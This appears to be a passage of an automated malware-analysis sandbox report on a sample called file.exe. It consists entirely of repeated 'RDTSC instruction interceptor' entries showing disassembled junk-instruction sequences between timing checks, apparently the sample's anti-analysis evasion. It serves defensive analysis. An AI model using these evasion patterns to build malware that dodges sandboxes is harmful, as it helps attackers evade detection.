                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D040F second address: 11D0413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D0413 second address: 11D0417 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D0417 second address: 11D042B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F5E94E4CBA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D6A77 second address: 11D6A7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D6A7B second address: 11D6A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D6A81 second address: 11D6A8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F5E94757C96h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DA496 second address: 11DA49A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DA49A second address: 11DA515 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F5E94757CA8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F5E94757CA4h 0x00000011 jmp 00007F5E94757C9Bh 0x00000016 jne 00007F5E94757C96h 0x0000001c jmp 00007F5E94757CA2h 0x00000021 popad 0x00000022 push edi 0x00000023 jp 00007F5E94757C96h 0x00000029 pop edi 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f je 00007F5E94757C96h 0x00000035 jmp 00007F5E94757CA1h 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DA515 second address: 11DA534 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5E94E4CBA6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F5E94E4CBB3h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DA534 second address: 11DA554 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94757CA6h 0x00000007 jp 00007F5E94757CA2h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DA554 second address: 11DA55A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DA933 second address: 11DA93F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5E94757C96h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DA93F second address: 11DA95D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jc 00007F5E94E4CBD4h 0x0000000d jns 00007F5E94E4CBAEh 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DEC99 second address: 11DEC9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DEC9F second address: 11DECA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DECA8 second address: 11DECB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5E94757C96h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DECB9 second address: 11DECC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DECC0 second address: 11DECDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94757CA2h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jc 00007F5E94757C96h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DECDE second address: 11DECE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118ADCE second address: 118ADE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 jp 00007F5E94757C96h 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118ADE1 second address: 118AE3C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5E94E4CBA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F5E94E4CBA8h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 push 00000004h 0x00000028 push 00000000h 0x0000002a push edi 0x0000002b call 00007F5E94E4CBA8h 0x00000030 pop edi 0x00000031 mov dword ptr [esp+04h], edi 0x00000035 add dword ptr [esp+04h], 00000017h 0x0000003d inc edi 0x0000003e push edi 0x0000003f ret 0x00000040 pop edi 0x00000041 ret 0x00000042 push edi 0x00000043 mov edi, dword ptr [ebp+122D1C7Ch] 0x00000049 pop ecx 0x0000004a nop 0x0000004b pushad 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118AE3C second address: 118AE46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DF673 second address: 11DF690 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94E4CBB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E405A second address: 11E4063 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E340C second address: 11E341E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007F5E94E4CBA8h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E341E second address: 11E3422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E3422 second address: 11E3438 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94E4CBB2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E3716 second address: 11E371B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E371B second address: 11E3727 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F5E94E4CBA6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E38C1 second address: 11E38C6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E38C6 second address: 11E38DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push esi 0x0000000b push edi 0x0000000c pop edi 0x0000000d jns 00007F5E94E4CBA6h 0x00000013 pop esi 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E3A3B second address: 11E3A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E55FD second address: 11E5601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E5601 second address: 11E5613 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94757C9Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E5613 second address: 11E561D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E561D second address: 11E5627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5E94757C96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E5627 second address: 11E562B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EC38C second address: 11EC3B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F5E94757C9Bh 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jmp 00007F5E94757C9Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EC3B0 second address: 11EC3B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ECCC4 second address: 11ECCCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F5E94757C96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ECCCE second address: 11ECCE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94E4CBB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ECF87 second address: 11ECF95 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ECF95 second address: 11ECF99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ECF99 second address: 11ECFA8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop esi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED801 second address: 11ED812 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F5E94E4CBA6h 0x00000009 ja 00007F5E94E4CBA6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED812 second address: 11ED818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED818 second address: 11ED849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F5E94E4CBB9h 0x0000000b jmp 00007F5E94E4CBAEh 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EDB0D second address: 11EDB16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1198 second address: 11F11A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1315 second address: 11F1337 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94757CA2h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F5E94757C96h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F14A9 second address: 11F14AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F14AF second address: 11F14B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F14B7 second address: 11F14BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F14BD second address: 11F14C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F14C2 second address: 11F14C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1750 second address: 11F1756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1756 second address: 11F1760 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1760 second address: 11F1764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1A30 second address: 11F1A39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1A39 second address: 11F1A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1BCB second address: 11F1BD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1BD9 second address: 11F1BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FEC21 second address: 11FEC40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94E4CBB9h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FEC40 second address: 11FEC44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FEC44 second address: 11FEC6B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5E94E4CBA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F5E94E4CBB6h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FD392 second address: 11FD3AD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop ebx 0x00000008 jns 00007F5E94757C9Ch 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FD808 second address: 11FD817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 jc 00007F5E94E4CBA8h 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FD817 second address: 11FD81E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE326 second address: 11FE32B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE32B second address: 11FE357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 js 00007F5E94757C96h 0x0000000c jno 00007F5E94757C96h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5E94757CA7h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FEABB second address: 11FEACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 jp 00007F5E94E4CBA6h 0x0000000c pop edx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1204EEA second address: 1204F0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5E94757C9Bh 0x0000000b popad 0x0000000c jmp 00007F5E94757C9Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push esi 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1204F0E second address: 1204F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1204F14 second address: 1204F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1204F1A second address: 1204F3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F5E94E4CBBDh 0x0000000b jmp 00007F5E94E4CBB7h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1204F3C second address: 1204F58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E94757CA8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12050A2 second address: 12050C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E94E4CBB5h 0x00000009 jng 00007F5E94E4CBA6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12050C1 second address: 12050D1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jng 00007F5E94757C96h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1205252 second address: 1205256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1205256 second address: 1205273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5E94757CA5h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1211467 second address: 121146D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121146D second address: 121147E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E94757C9Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121147E second address: 121148A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1149A18 second address: 1149A33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E94757CA5h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1149A33 second address: 1149A39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1149A39 second address: 1149A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jo 00007F5E94757C9Ch 0x0000000f jnl 00007F5E94757C96h 0x00000015 jo 00007F5E94757CAEh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1215594 second address: 12155C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5E94E4CBB2h 0x0000000b pushad 0x0000000c push edi 0x0000000d jmp 00007F5E94E4CBAEh 0x00000012 js 00007F5E94E4CBA6h 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12155C7 second address: 12155CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12155CB second address: 12155CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121E1D1 second address: 121E1DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F5E94757C96h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1225767 second address: 122576B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122576B second address: 122577B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F5E94757C98h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122C2F3 second address: 122C30A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F5E94E4CBA6h 0x00000009 jl 00007F5E94E4CBA6h 0x0000000f jnp 00007F5E94E4CBA6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123041B second address: 1230443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E94757C9Bh 0x00000009 jmp 00007F5E94757CA8h 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1230443 second address: 123044F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5E94E4CBAEh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
